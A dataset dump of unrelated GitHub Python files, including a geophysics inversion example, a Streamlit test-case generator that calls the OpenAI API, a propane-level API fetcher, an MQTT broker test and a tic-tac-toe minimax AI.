utils.Counter()\n opt.LSshorten = 0.5\n opt.remember(\"xc\")\n\n # Run inversion\n mopt = inv.run(m0)\n\n # Get diag(JtJ)\n mask_inds = np.ones(mesh.nC, dtype=bool)\n jtj = np.sqrt(updateSensW.JtJdiag[0])\n jtj /= jtj.max()\n temp = np.ones_like(jtj, dtype=bool)\n temp[jtj > 0.005] = False\n mask_inds[actind] = temp\n actind_final = np.logical_and(actind, ~mask_inds)\n jtj_cc = np.ones(mesh.nC) * np.nan\n jtj_cc[actind] = jtj\n\n # Show the sensitivity\n if plotIt:\n fig = plt.figure(figsize=(12, 3))\n ax = plt.subplot(111)\n temp = rho.copy()\n temp[~actind] = np.nan\n out = mesh.plot_image(\n jtj_cc,\n grid=True,\n ax=ax,\n grid_opts={\"alpha\": 0.2},\n clim=(0.005, 0.5),\n pcolor_opts={\"cmap\": \"viridis\", \"norm\": colors.LogNorm()},\n )\n ax.plot(\n survey.electrode_locations[:, 0], survey.electrode_locations[:, 1], \"k.\"\n )\n ax.set_xlim(IO.grids[:, 0].min(), IO.grids[:, 0].max())\n ax.set_ylim(-IO.grids[:, 1].max(), IO.grids[:, 1].min())\n cb = plt.colorbar(out[0])\n cb.set_label(\"Sensitivity\")\n ax.set_aspect(\"equal\")\n plt.show()\n\n # Convert obtained inversion model to resistivity\n # rho = M(m), where M(.) is a mapping\n\n rho_est = mapping * mopt\n rho_est[~actind_final] = np.nan\n rho_true = rho.copy()\n rho_true[~actind_final] = np.nan\n\n # show recovered conductivity\n if plotIt:\n fig, ax = plt.subplots(2, 1, figsize=(20, 6))\n out1 = mesh.plot_image(\n rho_true,\n clim=(10, 1000),\n pcolor_opts={\"cmap\": \"viridis\", \"norm\": colors.LogNorm()},\n ax=ax[0],\n )\n out2 = mesh.plot_image(\n rho_est,\n clim=(10, 1000),\n pcolor_opts={\"cmap\": \"viridis\", \"norm\": colors.LogNorm()},\n ax=ax[1],\n )\n out = [out1, out2]\n for i in range(2):\n ax[i].plot(\n survey.electrode_locations[:, 0], survey.electrode_locations[:, 1], \"kv\"\n )\n ax[i].set_xlim(IO.grids[:, 0].min(), IO.grids[:, 0].max())\n ax[i].set_ylim(-IO.grids[:, 1].max(), IO.grids[:, 1].min())\n cb = plt.colorbar(out[i][0], ax=ax[i])\n cb.set_label(r\"Resistivity ($\\Omega$m)\")\n ax[i].set_xlabel(\"Northing (m)\")\n ax[i].set_ylabel(\"Elevation (m)\")\n ax[i].set_aspect(\"equal\")\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"simpeg/simpeg","sub_path":"examples/_archived/plot_inv_dcip_dipoledipole_2_5Dinversion.py","file_name":"plot_inv_dcip_dipoledipole_2_5Dinversion.py","file_ext":"py","file_size_in_byte":7779,"program_lang":"python","lang":"en","doc_type":"code","stars":438,"dataset":"github-code","pt":"7"}
+{"seq_id":"25072093028","text":"from ast import AST, Store\nfrom typing import Iterator, List, Optional\n\nfrom .WalkAST import NodeStack\nfrom ..primitives import Primitive\n\nclass Reference:\n\tdef __init__(self, node: AST, stack: NodeStack):\n\t\tself.node = node\n\t\tself.stack = stack.copy()\n\t\tself.is_store: bool = hasattr(node, 'ctx') and type(node.ctx) == Store\n\t\n\tdef __eq__(self, other):\n\t\tif isinstance(other, AST):\n\t\t\treturn self.node == other\n\t\treturn super().__eq__(other)\n\nclass ProgramData:\n\n\tclass Element:\n\n\t\tdef __init__(\n\t\t\tself,\n\t\t\ttype: str,\n\t\t\tscope: int,\n\t\t\tid: str,\n\t\t\tdeclaration: Optional[AST],\n\t\t\tstack: Optional[NodeStack],\n\t\t) -> None:\n\t\t\tself.type = type\n\t\t\tself.scope = scope\n\t\t\tself.id = id\n\t\t\tself.declaration: Optional[Reference] = None\n\t\t\tself.container_scope: Optional[int] = None\n\t\t\tself.references: List[Reference] = []\n\t\t\tself.values: List[Primitive] = []\n\t\t\tself.evaluations: List[int] = []\n\t\t\tif declaration:\n\t\t\t\tself.declaration = Reference(declaration, stack or [])\n\n\t\tdef set_container_scope(self, scope: int) -> None:\n\t\t\tself.container_scope = scope\n\n\t\tdef reference(self, node: AST, stack: NodeStack) -> None:\n\t\t\tself.references.append(Reference(node, stack))\n\n\t\tdef value(self, value: Primitive) -> None:\n\t\t\tself.values.append(value)\n\n\t\tdef evaluation(self, branch: int) -> None:\n\t\t\tself.evaluations.append(branch)\n\n\t\tdef has_reference(self, node: AST) -> bool:\n\t\t\treturn node == self.declaration or node in self.references\n\n\t\tdef __repr__(self) -> str:\n\t\t\tcscope = f' -> S{self.container_scope}' if self.container_scope else ''\n\t\t\tinfo = [f'{self.type}: (S{self.scope}{cscope}) {self.id}']\n\t\t\tif not self.declaration is None:\n\t\t\t\tinfo.append(f' declared on {self.declaration.node.lineno}')\n\t\t\tif len(self.references) > 0:\n\t\t\t\tinfo.append(f' referenced on {\", \".join(str(r.node.lineno) for r in self.references)}')\n\t\t\tif len(self.values) > 0:\n\t\t\t\tinfo.append(f' assigned values {\", \".join(str(v) for v in self.values)}')\n\t\t\tif len(self.evaluations) > 0:\n\t\t\t\tinfo.append(f' evaluated {len(self.evaluations)} times')\n\t\t\treturn '\\n'.join(info)\n\n\tdef __init__(self):\n\t\tself.elements: List[self.Element] = []\n\n\tdef declare(\n\t\tself,\n\t\ttype: str,\n\t\tscope: int,\n\t\tid: str,\n\t\tdeclaration: Optional[AST] = None,\n\t\tstack: Optional[NodeStack] = None\n\t) -> Element:\n\t\tel = self.Element(type, scope, id, declaration, stack)\n\t\tself.elements.append(el)\n\t\treturn el\n\n\tdef element_n(self, n: int) -> Element:\n\t\treturn self.elements[n]\n\n\tdef element_for_node(self, node: AST, types: List[str]) -> Element:\n\t\tfor i, el in enumerate(self.elements):\n\t\t\tif el.type in types and el.has_reference(node):\n\t\t\t\treturn i, el\n\t\treturn None, None\n\t\n\tdef elements_for_types(self, types: List[str]) -> Iterator[Element]:\n\t\tfor el in self.elements:\n\t\t\tif el.type in types:\n\t\t\t\tyield el\n\n\tdef element_for_id(self, id: str) -> Element:\n\t\tfor el in self.elements:\n\t\t\tif el.id == id:\n\t\t\t\treturn el\n\t\treturn None\n\t\n\tdef element_for_scope(self, scope: int) -> Element:\n\t\tfor el in self.elements:\n\t\t\tif el.container_scope == scope:\n\t\t\t\treturn el\n\t\treturn None\n\t\n\tdef elements_in_scope(self, scope: int, types: List[str] = None) -> Iterator[Element]:\n\t\tfor el in self.elements:\n\t\t\tif el.scope == scope and (types is None or el.type in types):\n\t\t\t\tyield el\n\n\tdef __repr__(self) -> str:\n\t\treturn '\\n'.join(str(el) for el in self.elements)\n","repo_name":"teemulehtinen/qlcpy","sub_path":"qlcpy/instrument/ProgramData.py","file_name":"ProgramData.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"45989110637","text":"import dotenv\nimport openai\nimport re\nimport pandas as pd\nimport streamlit as st\nfrom streamlit_lottie import st_lottie\nfrom utils import load_lottie_url\n\nst.set_page_config(page_title=\"TestCaseGPT\", page_icon=\"🤖\", layout=\"wide\")\nconfig = dotenv.dotenv_values(\".env\")\nopenai.api_key = config['OPENAI_API_KEY']\n\nwith st.sidebar:\n lottie_image1 = load_lottie_url('https://assets1.lottiefiles.com/packages/lf20_ofa3xwo7.json')\n st_lottie(lottie_image1)\n\nst.markdown(\n \"\"\"\n TestCaseGPT,测试流程加速器 🚀️
\n 将用户故事转化为测试用例,只需一步 !
\n \"\"\",\n unsafe_allow_html=True\n)\n\n\ndef local_css(file_name):\n with open(file_name) as f:\n st.markdown(f\"\", unsafe_allow_html=True)\n\n\nlocal_css(\"style.css\")\nuser_story = st.text_input(label=\"📖 用户故事\", label_visibility=\"hidden\",\n placeholder=\"【用户故事描述】:作为___,我希望___,以便___。\", key=\"input\")\n\nprompt_userstory = \"我希望你作为一个软件产品经理,负责生成验收标准,用来验证软件是否符合用户故事中指定的功能要求。验收标准应该是具体的、可衡量的、可实现的、相关的。此外,你应该确保验收标准涵盖所有可能的情况和边缘案例。通过定义清晰而全面的验收标准,你可以帮助确保软件符合必要的标准,并确保用户的需求得到满足。按照描述的格式,就下面的主题写出10条专业而详细的验收标准。请尽你最大的努力。用中文回答。只返回验收标准的内容。不要返回其他内容。\" \\\n \"\\n主题: \" + user_story\n\nprompt_testcase = \"您是软件测试和软件质量保证方面的专家,专门从事功能测试,您帮助我之前的许多人生成了满足特定要求的功能测试用例。\\n\" \\\n \"您生成的测试用例能涵盖正常场景、异常场景、边界场景。\\n\" \\\n \"您生成的测试用例优先级包括 P0、P1、P2,P0为最高优先级,P2代表最低优先级。\\n\" \\\n \"以所述测试用例格式,至少编写五条关于以下主题的专业和详细测试用例。尽你最大的努力。请使用中文回答, 请勿返回除测试用例内容以外的其他内容。不要用引号包装响应。\\n\" \\\n \"测试用例格式:\\n\" \\\n \"用例编号:\\n\" \\\n \"用例名称:\\n\" \\\n \"用例类型:\\n\" \\\n \"优先级:\\n\" \\\n \"前置条件:\\n\" \\\n \"步骤描述:\\n\" \\\n \"预期结果:\\n\" \\\n \"主题: \"\n\n\ndef clean_criteria(text):\n # 先对文本按照换行符进行分割\n lines = text.split(\"\\n\")\n new_lines = []\n for line in lines:\n # 如果是空行,空字符串,单个字符串,直接丢弃\n if len(line) < 2:\n continue\n new_lines.append(re.sub(r'^(\\d+).', '📝 ', line))\n\n text = \"\\n\".join(new_lines)\n return text\n\n\ndef clean_testcase(text):\n # 先对文本按照换行符进行分割,如果有连续的换行符,那么分割出来的元素会是空字符串\n lines = text.split(\"\\n\")\n new_lines = \"\"\n for line in lines:\n # 如果不是空字符串,那么就是正常的文本,需要进行处理\n if line != \"\":\n # 先把正常文本开头的数字和点给去掉\n line = re.sub(r'^(\\d+)\\. ', '', line)\n # 继续去除末尾的空字符串\n line = line.rstrip()\n # 把处理好的文本拼接起来\n new_lines += line + \" \"\n # 如果是空字符串,那么就是连续的换行符\n else:\n # 先把新字符串末尾的\n new_lines.rstrip(\" \")\n # 再添加一个换行符,用来分隔不同的测试用例\n new_lines += \"\\n\"\n\n return new_lines\n\n\ndef output_criteria(prompt):\n # 输出验收标准\n generate_criteria = \"\"\n openai_resp = []\n for resp in openai.Completion.create(model=\"text-davinci-003\", prompt=prompt, stream=True,\n max_tokens=1024,\n temperature=0.7\n ):\n openai_resp.append(resp.choices[0].text)\n generate_criteria = \"\".join(openai_resp).strip()\n formatted_text = f\"{clean_criteria(generate_criteria)}
\"\n criteria_box.markdown(formatted_text, unsafe_allow_html=True)\n return generate_criteria\n\n\ndef output_testcase(case_title):\n formatted_text = \"\"\n openai_resp = []\n prompt = prompt_testcase + case_title\n for resp in openai.Completion.create(model=\"text-davinci-003\", prompt=prompt, stream=True,\n max_tokens=3072,\n temperature=0.7):\n openai_resp.append(resp.choices[0].text)\n generate_testcase = \"\".join(openai_resp).strip()\n formatted_text = clean_testcase(generate_testcase)\n markdown_text = f\"{formatted_text}
\"\n case_box.markdown(markdown_text, unsafe_allow_html=True)\n return formatted_text\n\n\ndef export_testcase(InputCase):\n # 定义正则表达式\n regex = r\"用例编号(.+) 用例名称(.+) 用例类型(.+) 优先级(.+) 前置条件(.+) 步骤描述(.+) 预期结果(.+)\"\n TestCaseLines = re.findall(regex, InputCase)\n CaseIds = []\n Names = []\n CaseTypes = []\n Priorities = []\n Preconditions = []\n Steps = []\n ExpectedResults = []\n for line in TestCaseLines:\n # 删除开头的中英文冒号和空格\n CaseId = line[0]\n CaseId = re.sub(r'^:', '', CaseId)\n CaseId = re.sub(r'^:', '', CaseId).strip()\n CaseIds.append(CaseId)\n\n # 删除开头的中英文冒号和空格\n Name = line[1]\n Name = re.sub(r'^:', '', Name)\n Name = re.sub(r'^:', '', Name).strip()\n Names.append(Name)\n\n # 删除开头的中英文冒号和空格\n CaseType = line[2]\n CaseType = re.sub(r'^:', '', CaseType)\n CaseType = re.sub(r'^:', '', CaseType).strip()\n CaseTypes.append(CaseType)\n\n # 删除开头的中英文冒号和空格\n Priority = line[3]\n Priority = re.sub(r'^:', '', Priority)\n Priority = re.sub(r'^:', '', Priority).strip()\n Priorities.append(Priority)\n\n # 删除开头的中英文冒号和空格\n Precondition = line[4]\n Precondition = re.sub(r'^:', '', Precondition)\n Precondition = re.sub(r'^:', '', Precondition).strip()\n Preconditions.append(Precondition)\n\n # 删除开头的中英文冒号和空格\n Step = line[5]\n Step = re.sub(r'^:', '', Step)\n Step = re.sub(r'^:', '', Step).strip()\n Steps.append(Step)\n\n # 删除开头的中英文冒号和空格\n ExpectedResult = line[6]\n ExpectedResult = re.sub(r'^:', '', ExpectedResult)\n ExpectedResult = re.sub(r'^:', '', ExpectedResult).strip()\n ExpectedResults.append(ExpectedResult)\n\n test_case_data = {'用例名称': Names, '用例类型': CaseTypes, '优先级': Priorities,\n '前置条件': Preconditions,\n '步骤描述': Steps, '预期结果': ExpectedResults}\n data = pd.DataFrame(test_case_data)\n st.dataframe(data)\n\n # 将DataFrame写入Excel文件\n excel_data = {'用例名称': Names, '用例类型': CaseTypes, '优先级': Priorities,\n '前置条件': Preconditions,\n '步骤描述': Steps, '预期结果': ExpectedResults, '维护人': \"marsdev\"}\n data = pd.DataFrame(excel_data)\n data.to_excel('测试用例.xlsx', index=False)\n\n # 将Excel文件读取为字节流\n\n if st.download_button:\n st.error('想体验更多付费功能,请升级到 Testcaseplus💫', icon=\"🚨\")\n with open('测试用例.xlsx', 'rb') as f:\n excel_bytes = f.read()\n # 将Excel文件作为字节流提供给用户进行下载\n st.download_button(label='导出测试用例', data=excel_bytes, file_name='测试用例.xlsx',\n mime='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n\n\nif st.button(\"一键生成测试用例\", type=\"primary\"):\n user_story.replace(\"\\n\", \"\")\n if not user_story:\n st.warning('请输入用户故事')\n st.stop()\n\n criteria_box = st.expander(label=\"测试点拆分\", expanded=True)\n with criteria_box:\n criteria_box = st.empty()\n criteria = output_criteria(prompt_userstory)\n testcase_box = st.expander(label=\"测试用例生成\", expanded=True)\n with testcase_box:\n case_box = st.empty()\n all_case = re.split(r\"\\n\", criteria)\n case_list = []\n for case in all_case:\n print(\"before sub\")\n print(case)\n case = re.sub(r'^(\\d+).', '', case)\n case = case.lstrip()\n print(\"after sub\")\n print(case)\n if len(case) < 2:\n continue\n case_list.append(case)\n print(case_list)\n testcase = output_testcase(case_list[0])\n export_testcase(testcase)\n\n","repo_name":"sunwandi04/testcase","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9512,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"75083079264","text":"import os\n\ncook_book = dict()\n\nwith open('recipes.txt', 'r', encoding='utf-8') as f:\n lines = f.readlines()\n list = []\n result = []\n n = '\\n'\n for l in lines:\n if l == '\\n':\n list += l\n result.append(list)\n list = []\n else:\n list.append(l)\n result.append(list)\n\nfor cook_list in result:\n ingredient_list = []\n\n for list_ in cook_list:\n list = list_.replace('\\n', '')\n if \"|\" in list:\n ing_list = list.split(' | ')\n ingredient_list.append(ing_list)\n ing_list = []\n\n for ing_list_2 in ingredient_list:\n ing_dict = dict()\n if ing_list_2:\n ing_dict['ingredient_name'] = ing_list_2[0]\n ing_dict['quantity'] = ing_list_2[1]\n ing_dict['measure'] = ing_list_2[2]\n ing_list.append(ing_dict)\n cook_book[cook_list[0].replace('\\n', '')] = ing_list\n\n\ndef get_shop_list_by_dishes(dishes: list, person_count: int) -> dict:\n \"\"\"Функция обрабатывает список блюд и количество персон.\n\n :param dishes: Список блюд.\n :param person_count: Количество человек.\n :return: Выводит на экран список ингредиентов\n для приготовления всех блюд.\n \"\"\"\n food_basket = {}\n for dish in dishes:\n if dish not in cook_book:\n raise TypeError(f'{dish} отсутствует в кулинарной книге')\n for ingredient in cook_book[dish]:\n if ingredient['ingredient_name'] not in food_basket:\n food_basket[ingredient['ingredient_name']] \\\n = {'measure': ingredient['measure'], 'quantity': \\\n int(ingredient['quantity']) * person_count}\n else:\n food_basket[ingredient['ingredient_name']]['quantity'] \\\n += int(ingredient['quantity']) * person_count\n return food_basket\n\n\ndef get_dirs_and_files():\n \"\"\" Функция создает ссылку \"dirs\" на заданную директорию и\n создает список файлов в ней.\n\n :return: Вызывает функцию get_len_files() и передает\n подготовленные данные.\"\"\"\n path = os.path.join(os.getcwd() + '\\sorted/')\n result = os.walk(path)\n for dirs, folder, files in result:\n dirs_ = dirs\n files_ = files\n return get_len_files(dirs_, files_)\n\n\ndict_lens_and_files = dict()\n\n\ndef get_len_files(dirs, files):\n \"\"\" Функция создает словарь. Ключами словаря являются количкество\n строк в файлах, а значениями имена файлов соответственно.\n\n :param dirs: Ссылка на заданную директорию.\n :param files: Список файлов в заданной папке.\n :return: Вызывает функцию sorted_files_dict().\"\"\"\n for file in files:\n file_path = dirs + file\n with open(file_path, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n file_len = len(lines)\n dict_lens_and_files[file_len] = file\n return sorted_files_dict()\n\n\nsorted_dict = dict()\n\n\ndef sorted_files_dict():\n \"\"\" Функция сортирует словарь по ключу.\n :return: Вызывает функцию save_sorted_files().\"\"\"\n sorted_dict.update(dict(sorted(dict_lens_and_files.items())))\n return save_sorted_files()\n\n\ndef save_sorted_files():\n \"\"\" Функция записывает информацию о всех файлах и текст из самих файлов\n из заданной папки в новый файл.\n Каждый раз файл удаляется и создается заново.\n :return: Результат всей операции выводится на экран.\"\"\"\n file_link = os.path.join(os.getcwd(), 'file.txt')\n os.remove(file_link)\n for file_num in sorted_dict:\n file_for_link = sorted_dict.get(file_num)\n file_link_ = os.path.join(os.getcwd() + '\\sorted/', file_for_link)\n h1 = sorted_dict.get(file_num)\n with open(file_link_, 'rt', encoding='utf-8') as fl:\n lines = fl.readlines()\n with open(file_link, 'a+') as f:\n f.write(f'{h1}\\n')\n f.write(f'{file_num}\\n')\n for line in lines:\n f.write(line.strip())\n f.write(f'\\n')\n f.flush()\n with open('file.txt') as f1:\n result = f1.read()\n return result\n\n\nprint()\nprint()\n\n# Вызываем функцию по получению списка продуктов из кулинарной\n# книги согласно списку блюд\nprint(get_shop_list_by_dishes(['Запеченный картофель', 'Омлет', 'Фахитос'], 2))\n\nprint()\nprint()\n\n# Вызываем функцию для последующей сортировки и объединения\n# текстовых файлов в один\nprint(get_dirs_and_files())\n","repo_name":"VolshVs/OOP_2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"73856997022","text":"from concurrent.futures import ThreadPoolExecutor, as_completed\nfrom typing import Union\n\nfrom gpt_generator.modules.architector import gpt_architector\nfrom gpt_generator.modules.worker import gpt_worker\nfrom helpers.architecture_extractor import structure_2_dict\nfrom helpers.code_extractor import extract_code\nfrom models.file_interface import File_Collection, File_to_write\nfrom models.gpt_responses_interface import ArchitectorResponse\n\nimport logging\n\nlogging.basicConfig(level=logging.ERROR)\n\n\ndef gpt_main(prompt: str) -> File_Collection:\n try:\n # Generate initial project and response\n project, response = gpt_architector(prompt)\n\n # Assert project is of the correct type\n assert isinstance(project, ArchitectorResponse)\n\n # Initialize File_Collection\n file_collection = File_Collection(project.name)\n\n # Add initial response to collection\n file_collection.collections[\"raw_responses\"].append(\n File_to_write(\"architector.txt\", str(response))\n )\n\n structure_dictionary: dict[str, str] = structure_2_dict(project.structure)\n\n # Create a ThreadPool to execute gpt_worker on each file\n with ThreadPoolExecutor() as executor:\n future_to_file = {executor.submit(\n gpt_worker, project, file.file_name, file.description): file for file in project.files}\n\n for future in as_completed(future_to_file):\n try:\n # Obtain the completed future's corresponding file\n file = future_to_file[future]\n\n # Get the result from the future\n result = future.result()\n\n # Add results to the collection\n file_collection.collections[\"raw_responses\"].append(\n File_to_write(f\"raw_{file.file_name}.txt\", result, \"\")\n )\n file_collection.collections[\"formatted_responses\"].append(\n File_to_write(file.file_name, extract_code(result),\n structure_dictionary[file.file_name])\n )\n except Exception as e:\n # Log any exceptions that occur within the thread\n logging.error(f\"An error occurred in thread: {e}\")\n\n return file_collection\n\n except Exception as e:\n # Log any other exceptions\n logging.error(f\"An error occurred: {e}\")\n return File_Collection(\"\")\n","repo_name":"bukomp/mAIcroservicer","sub_path":"src/gpt_generator/gpt_main.py","file_name":"gpt_main.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"14526738976","text":"#!/usr/bin/env python\n\nimport subprocess\n\nimport inspect, os, sys\n# From http://stackoverflow.com/questions/279237/python-import-a-module-from-a-folder\ncmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],\"..\")))\nif cmd_subfolder not in sys.path:\n sys.path.insert(0, cmd_subfolder)\n\nimport mosq_test\n\ndef write_config(filename, port1, port2):\n with open(filename, 'w') as f:\n f.write(\"port %d\\n\" % (port1))\n f.write(\"\\n\")\n f.write(\"listener %d\\n\" % (port2))\n f.write(\"mount_point mount/\\n\")\n f.write(\"\\n\")\n f.write(\"log_type debug\\n\")\n\n(port1, port2) = mosq_test.get_port(2)\nconf_file = os.path.basename(__file__).replace('.py', '.conf')\nwrite_config(conf_file, port1, port2)\n\nrc = 1\nkeepalive = 60\nconnect_packet = mosq_test.gen_connect(\"test2\", keepalive=keepalive)\nconnack_packet = mosq_test.gen_connack(rc=0)\n\nmid = 1\nsubscribe_packet = mosq_test.gen_subscribe(mid, \"#\", 0)\nsuback_packet = mosq_test.gen_suback(mid, 0)\n\npublish_packet = mosq_test.gen_publish(\"mount/test\", qos=0, payload=\"mount point\")\n\nbroker = mosq_test.start_broker(filename=os.path.basename(__file__), use_conf=True, port=port1)\n\ntry:\n sock = mosq_test.do_client_connect(connect_packet, connack_packet, timeout=20, port=port1)\n sock.send(subscribe_packet)\n\n if mosq_test.expect_packet(sock, \"suback\", suback_packet):\n pub = subprocess.Popen(['./10-listener-mount-point-helper.py', str(port2)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n pub.wait()\n (stdo, stde) = pub.communicate()\n # Should have now received a publish command\n\n if mosq_test.expect_packet(sock, \"publish\", publish_packet):\n rc = 0\n\n sock.close()\nfinally:\n os.remove(conf_file)\n broker.terminate()\n broker.wait()\n (stdo, stde) = broker.communicate()\n if rc:\n print(stde)\n\nexit(rc)\n\n","repo_name":"hui6075/mosquitto-cluster","sub_path":"test/broker/10-listener-mount-point.py","file_name":"10-listener-mount-point.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":316,"dataset":"github-code","pt":"7"}
+{"seq_id":"2372667998","text":"import copy\nimport random\n\n\nclass AI:\n\n def __init__(self, player=2):\n self.player = player\n\n def random(self, board):\n empty_squares = board.get_empty_squares()\n random_index = random.randrange(0, len(empty_squares))\n return empty_squares[random_index]\n\n def minimax(self, board, maximizing):\n\n case = board.check_victory_conditions()\n\n if case == 1:\n return 1, None\n\n if case == 2:\n return -1, None\n\n elif board.isfull():\n return 0, None\n\n if maximizing:\n max_evaluation = -10\n best_move = None\n empty_squares = board.get_empty_squares()\n\n for (row, col) in empty_squares:\n temp_board = copy.deepcopy(board)\n temp_board.mark_square(row, col, 1)\n evaluation = self.minimax(temp_board, False)[0]\n if evaluation > max_evaluation:\n max_evaluation = evaluation\n best_move = (row, col)\n\n return max_evaluation, best_move\n\n elif not maximizing:\n min_evaluation = 10\n best_move = None\n empty_squares = board.get_empty_squares()\n\n for (row, col) in empty_squares:\n temp_board = copy.deepcopy(board)\n temp_board.mark_square(row, col, self.player)\n evaluation = self.minimax(temp_board, True)[0]\n if evaluation < min_evaluation:\n min_evaluation = evaluation\n best_move = (row, col)\n\n return min_evaluation, best_move\n\n def evaluate_impossible_difficulty(self, main_board):\n evaluation, move = self.minimax(main_board, False)\n return move\n\n def evaluate_medium_difficulty(self, main_board):\n move = self.random(main_board)\n i = random.randint(1, 6)\n if i in range(1, 5):\n evaluation, move = self.minimax(main_board, False)\n return move\n\n def evaluate_easy_difficulty(self, main_board):\n move = self.random(main_board)\n return move\n","repo_name":"Tox2401/TicTacToe","sub_path":"AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"13629392545","text":"# Get propane data from Otodata API\n# The time-based series are stored in InfluxDB.\n\n# Requires username/password used with the Nee-vo mobile app (or similar app)\n\nimport json\nimport requests\nimport datetime\nfrom pytz import timezone\nfrom influxdb import InfluxDBClient\n\n# Set parameters\nNEEVO_AUTH = ''\nTIMEZONE = 'US/Eastern'\nPROVIDER_NAME = ''\nMETRIC_NAME = 'propane'\n\nINFLUXDB_HOST = ''\nINFLUXDB_PORT = ''\nINFLUXDB_USERNAME = ''\nINFLUXDB_PASSWORD = ''\nINFLUXDB_DATABASE = ''\n\n# Instantiate database\ninfluxClient = InfluxDBClient(\n host=INFLUXDB_HOST,\n port=INFLUXDB_PORT,\n username=INFLUXDB_USERNAME,\n password=INFLUXDB_PASSWORD,\n database=INFLUXDB_DATABASE\n)\n\n\ndef getDateTimeByZone(tz):\n t = timezone(tz)\n return datetime.datetime.now(t)\n\n\ndef printme(str):\n t = getDateTimeByZone(TIMEZONE)\n print(t.strftime(\"%Y-%m-%d %H:%M:%S\"), str)\n return\n\n\ndef processChartData(tank_size, tank_level):\n try:\n remaining = (tank_level/100) * tank_size\n json_body = []\n json_body.append({\n \"measurement\": METRIC_NAME,\n \"tags\": {\n \"source\": PROVIDER_NAME\n },\n \"time\": getDateTimeByZone(TIMEZONE),\n \"fields\": {\n \"litres\": remaining,\n \"level\": tank_level\n }\n })\n influxClient.write_points(json_body)\n\n except Exception as e:\n if hasattr(e, 'message'):\n printme(e.message)\n else:\n printme(e)\n exit(0)\n\ndef main():\n\n session = requests.Session()\n\n printme(\"Getting levels\")\n r = session.get(\n \"https://telematics.otodatanetwork.com:4432/v1.5/DataService.svc/GetAllDisplayPropaneDevices\",\n headers={\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US;q=1, fa-US;q=0.9\",\n \"User-Agent\": \"Nee-Vo/2.5 (iPhone; iOS 16.0.2; Scale/3.00)\",\n \"Host\": \"telematics.otodatanetwork.com:4432\",\n \"Authorization\": NEEVO_AUTH\n }\n )\n\n j = json.loads(r.text)\n processChartData(j[0]['TankCapacity'], j[0]['Level'])\n\n printme('Finished')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CeeBeeEh/Otodata-HASS","sub_path":"otodata-hass.py","file_name":"otodata-hass.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"20295782830","text":"from typing import Iterable\nfrom meshed import DAG\nfrom front import APP_KEY, RENDERING_KEY, ELEMENT_KEY, NAME_KEY\nfrom collections.abc import Callable\nfrom front.crude import prepare_for_crude_dispatch\nfrom streamlitfront.elements import TextInput, SelectBox\n\nfrom streamlitfront.base import mk_app\nfrom streamlitfront.examples.util import Graph\nfrom streamlitfront.elements import (\n AudioRecorder,\n FileUploader,\n MultiSourceInput,\n)\nimport streamlit as st\n\nparam_to_mall_maps = dict(train_audio='train_audio', tag='tag_store')\n\nif 'mall' not in st.session_state:\n st.session_state['mall'] = dict(\n # train_audio={},\n # tag={},\n # unused_store={\"to\": \"illustrate\"},\n tag_sound_output={}\n )\n\nmall = st.session_state['mall']\n# mall = dict(\n# # train_audio={},\n# # tag={},\n# # unused_store={\"to\": \"illustrate\"},\n# tag_sound_output={}\n# )\n\n\ndef crudify(funcs):\n for func in funcs:\n yield prepare_for_crude_dispatch(\n func, param_to_mall_map=param_to_mall_map, mall=mall\n )\n\n\nWaveForm = Iterable[int]\n\n\n# @code_to_dag\n@prepare_for_crude_dispatch(mall=mall, output_store='tag_sound_output')\ndef tag_sound(train_audio: WaveForm, tag: str):\n # mall[\"tag_store\"] = tag\n return (train_audio, tag)\n\n\n@prepare_for_crude_dispatch(mall=mall, param_to_mall_map={'result': 'tag_sound_output'})\ndef display_tag_sound(result):\n return result\n\n\n# crudified_tag_sound = prepare_for_crude_dispatch(\n# tag_sound, mall=mall, output_store=\"tag_sound_output\"\n# )\n# crudified_display_tag_sound = prepare_for_crude_dispatch(\n# display_tag_sound, mall=mall, param_to_mall_map={\"result\": \"tag_sound_output\"}\n# )\n\nprint(type(tag_sound))\nfrom i2 import Sig\n\nprint(Sig(display_tag_sound))\n\nconfig_ = {\n APP_KEY: {'title': 'Simple Real Audio ML'},\n # OBJ_KEY: {\"trans\": crudify},\n RENDERING_KEY: {\n 'tag_sound': {\n # \"description\": {\"content\": \"A very simple learn model example.\"},\n 'execution': {\n 'inputs': {\n 'train_audio': {\n ELEMENT_KEY: MultiSourceInput,\n 'From a file': {ELEMENT_KEY: FileUploader, 'type': 'wav',},\n 'From the microphone': {ELEMENT_KEY: AudioRecorder},\n },\n # \"tag\": {\n # ELEMENT_KEY: TextInput,\n # },\n },\n }\n },\n 'display_tag_sound': {\n 'execution': {\n 'inputs': {\n 'result': {\n ELEMENT_KEY: SelectBox,\n 'options': mall['tag_sound_output'],\n },\n }\n },\n },\n DAG: {'graph': {ELEMENT_KEY: Graph, NAME_KEY: 'Flow',},},\n Callable: {\n 'execution': {\n 'inputs': {\n 'save_name': {ELEMENT_KEY: TextInput, NAME_KEY: 'Save output as',},\n }\n },\n },\n },\n}\n\napp = mk_app([tag_sound, display_tag_sound], 